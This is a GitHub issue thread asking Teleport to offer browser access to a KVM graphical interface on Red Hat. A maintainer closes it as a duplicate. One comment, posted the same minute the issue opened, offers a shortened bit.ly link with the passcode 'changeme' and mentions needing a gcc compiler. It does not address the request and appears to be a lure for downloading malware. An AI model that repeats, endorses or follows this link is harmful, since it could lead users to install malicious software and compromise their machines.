### ISSUE TITLE
Request for open a web interface remotely

### ISSUE THREAD

**Issue by jemeesh** [gravitational/teleport#46283] opened 2024-09-05 13:09 UTC
What would you like Teleport to do?
Open access to kvm gui from redhat
Similarly i can reach any remote machines gui through browser remotely

What problem does this solve?
creating virtual machines and edits more easier

If a workaround exists, please include it.

**Comment by andersonsilva87** [comment] 2024-09-05 13:09
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by strideynet** [comment] 2024-09-05 13:58
Is this a duplicate of https://github.com/gravitational/teleport/issues/13179 ?

**Comment by strideynet** [comment] 2024-09-11 12:22
Closing as dupe of https://github.com/gravitational/teleport/issues/13179 ?

**Closed by strideynet** 2024-09-11 12:22 UTC
Labels: feature-request
